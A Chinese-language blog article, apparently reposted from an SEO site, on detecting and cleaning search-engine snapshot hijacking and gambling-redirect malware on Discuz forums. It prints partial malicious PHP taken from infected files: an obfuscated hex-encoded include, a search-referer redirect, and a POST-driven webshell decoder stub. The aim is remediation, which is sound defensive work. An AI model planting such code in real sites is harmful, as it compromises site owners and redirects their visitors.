00X0 網(wǎng)站被掛馬 搜索引擎快照被劫持 網(wǎng)頁被跳轉(zhuǎn)

如果你的網(wǎng)站被劫持到一些非法站點(diǎn)上導(dǎo)致網(wǎng)站被標(biāo)記為非法、賭博時(shí)，可能直接會被各種瀏覽器和搜索引擎標(biāo)記為“惡意網(wǎng)站”從而直接攔截。世間最痛苦的事莫過于此，特么的被人陰了…

苦心經(jīng)營網(wǎng)站多年，樹立口碑不容易。一日被黑，日日被劫持。從此以后用戶通過搜索引擎打開你的網(wǎng)站不是色情就是賭博。正常業(yè)務(wù)啥都沒了，也別再談什么可信度和口碑了。網(wǎng)站被收錄與網(wǎng)站無關(guān)且違禁的博彩關(guān)鍵詞，如果處理不及時(shí)，措施不當(dāng)?shù)却愕膶⑹撬阉饕娴膽土P：網(wǎng)站排名與權(quán)重下降，輕則不收錄重則被k。

00X1 站長們苦惱的問題

網(wǎng)站被掛馬該怎么解決？網(wǎng)站掛馬的解決方法、網(wǎng)站被掛馬怎么排查？網(wǎng)站老是被黑被掛馬是什么原因？如何檢測網(wǎng)站被掛馬？網(wǎng)站快照被劫持怎么辦？搜索引擎劫持怎么解決？百度快照被篡改劫持怎么回事？360快照被劫持怎么解決？discuz（DZ）被掛馬快照被劫持的解決辦法？dz論壇被掛馬、快照劫持怎么防范？網(wǎng)頁被跳轉(zhuǎn)到博彩頁面怎么辦？諸如此類的問題不在羅列實(shí)在是太多了，下面就解決你的疑問！

00X2 掛馬原理分析

快照劫持、搜索跳轉(zhuǎn)其實(shí)是黑帽SEO利用站中站腳本自動(dòng)繁殖文章“能熟練應(yīng)用快照劫持(流量、爬蟲、權(quán)重) 搜索跳轉(zhuǎn)到自動(dòng)繁殖文章（站中站腳本）做自己關(guān)鍵詞獲取定向流量的方法”

搜索引擎快照劫持是通過代碼來判斷和識別蜘蛛訪問的，若正常訪問，則給出正常內(nèi)容，若判斷到是搜素引擎來訪問，就給出另一個(gè)頁面，使搜素引擎抓取快照進(jìn)行改變，之后判斷來路跳轉(zhuǎn)。

[快照劫持掛馬方法] 多為下面兩種方式實(shí)現(xiàn)其劫持功能

第一種：放在上html聲明內(nèi)引導(dǎo)劫持快照

這種劫持要比放在源碼中更加高明難以發(fā)現(xiàn)，查看源碼是看不到任何痕跡的。

第二種：利用字典文件繁殖文章使用include引用并提交給搜索引擎實(shí)施劫持

字典文件是一些關(guān)鍵詞文件為文章生成提供資源，生成劫持靜態(tài)文件放到要引用的文件中，根據(jù)SEO知識可知一般目錄都不會太深，比較深的一般會有sitemap文件放在根目錄引導(dǎo)蜘蛛爬取，平時(shí)注意下你的目錄下sitemap.txt是否被篡改。

第一種是最簡單粗暴的加到頁面header文件里面引導(dǎo)蜘蛛。第二種相對更加隱蔽些，只需在Include中加上劫持目錄即可。

Include引用代碼：

@include($_SERVER[‘DOCUMENT_ROOT’].PACK(‘H*’,’2F646174612F737973646174612F30′));

【處理方法】解密代碼：2F646174612F737973646174612F30 解蜜后為：/data/sysdata/0查看此目錄找到并清理木馬文件。

00X3 DZ論壇掛馬常被反復(fù)篡改的文件

function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。

一定有很多站長會遇到這個(gè)問題，不論怎么修改FTP密碼，換服務(wù)器…class_core.php文件還是反復(fù)被掛馬，class_core.php文件反復(fù)被掛馬什么原因？一會是class_core.php被修改，一會是config_global.php被修改。那是因?yàn)槟抉R后門已經(jīng)扎根在你cms程序內(nèi)部了，會時(shí)刻被喚醒使用。

class_core.php常被插入劫持<head>以上部分代碼，就是第一種html聲明劫持。查看源碼看不到任何信息，只能抓取診斷。

為防惡意使用，僅貼出部分代碼。

error_reporting(0);

$S9 = explode(“|”,_decode(‘NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg==’));

00X4?網(wǎng)站快照被劫持解決方法

1、進(jìn)discuz后臺找到工具-文件校驗(yàn)，找到最近被修改的php文件與源文件對比下。

2、dz的文件校驗(yàn)不會檢查utility文件夾，除了upload里的文件，其他輔助功能文件一般用不到，如上傳了請刪除，避免被黑客利用。

3、使用后臺文件校驗(yàn)看修改文件，UCcenter校驗(yàn)UC文件修改。

4、網(wǎng)站目錄使用時(shí)間排序方式，查看最近修改的文件有沒有可疑。

5、404態(tài)設(shè)置到位，可很大程度避免收錄不存在的博彩劫持頁面。

6、看網(wǎng)站目錄內(nèi)有沒有被上傳的tools目錄或tools類型文件。

7、要有一查到底的決心，不然很難找到黑客埋藏的根基。

8、多方位加強(qiáng)防護(hù)，讓劫持死于搖籃…

00X5 網(wǎng)站被劫持了怎么查看目錄變化

站長們要學(xué)會從側(cè)面發(fā)現(xiàn)快照劫持，不要僅僅在百度一個(gè)搜索引擎內(nèi)site，要在多個(gè)搜索引擎內(nèi)site，這樣可以利用搜索引擎?zhèn)让鏅z測反應(yīng)網(wǎng)站快照劫持問題，只要有一個(gè)有劫持問題，就說明你網(wǎng)站一定被掛馬了。并不是所有的搜索引擎都在同一時(shí)間內(nèi)被劫持快照的，因?yàn)樗阉饕媾c搜索引擎算法技術(shù)的成熟程度是不一樣的，還有就是你網(wǎng)站本身與搜索引擎爬蟲友好度有關(guān)。

綜上述解決快照劫持的大概步驟：校驗(yàn)文件-修改替換原始文件-設(shè)定404-舉報(bào)/更新快照…

加強(qiáng)防范建議：插件不要隨便使用，后門很多。

00X6 讓你們見識下快照劫持字典文件、站中站腳本目錄長什么樣

快照劫持頁面內(nèi)容多為博彩、賭具、特服小姐等黃賭毒違法信息或其他辦證，公關(guān)小姐類灰色外推行業(yè)關(guān)鍵詞。

00X7 搜索引擎快照劫持?jǐn)U展閱讀

1、什么是搜索引擎快照劫持？

快照劫持：利用網(wǎng)站程序漏洞或爆破ftp，掛馬篡改網(wǎng)頁信息并主動(dòng)post提交給搜索引擎，讓其抓取收錄，快照的內(nèi)容多為博彩等推廣內(nèi)容。

2、搜索引擎快照劫持技術(shù)是什么？

搜索引擎劫持主要分快照劫持與跳轉(zhuǎn)劫持，就是傳說中的黑帽SEO手法快照劫持與流量劫持。其中快照劫持有的直接篡改原始網(wǎng)頁掛馬劫持，有的再生成新鏈接或上傳大量靜態(tài)頁面掛黃賭毒博彩相關(guān)行業(yè)推廣詞；跳轉(zhuǎn)劫持是使用跳轉(zhuǎn)腳本讓訪問鏈接跳轉(zhuǎn)到其他指定博彩站頁面，主要是提高網(wǎng)站受眾群體量與增加網(wǎng)站曝光度。

3、最新快照劫持及網(wǎng)頁篡改網(wǎng)站入侵掛馬問題

class_core.php文件插入跳轉(zhuǎn)代碼

error_reporting(E_ALL);

@error_reporting(1);

@$ref = strtolower($_SERVER[‘HTTP_REFERER’]);

@$jump_ref = explode(“|”,”haoso.|so.|haosou.|google.|soso.”);

foreach($jump_ref as $r){

$r = trim($r);

if(stristr($ref,$r)){

if($_GET[‘tid’]>50000){

header(‘Location: http://www.xxxxxxxxx.com/?op5u’);

die();

}

}

}

<?php

error_reporting(0);set_time_limit(0);

$GuTou=@$_POST[“gutou”];

if($GuTou){

$cc=””;for($i=0;$i<strlen($GuTou);$i+=2)

$cc.=urldecode(“%”.substr($GuTou,$i,2));

}

?>

如何發(fā)現(xiàn)被快照劫持了

使用語法 關(guān)鍵詞 site：語法 【】【官網(wǎng)入口】…

discuz被掛馬discuz百度快照被劫持的解決方法

[DZ掛馬]discuz!論壇360快照劫持的處理方法

dz論壇被掛馬、快照劫持怎么防范？

關(guān)于dz論壇惡意掛賭博廣告的排查心得

discuz被掛馬_百度快照被劫持的解決辦法

網(wǎng)站被掛馬_各大搜索引擎快照被劫持的處理方法

本文轉(zhuǎn)載至：微山湖SEO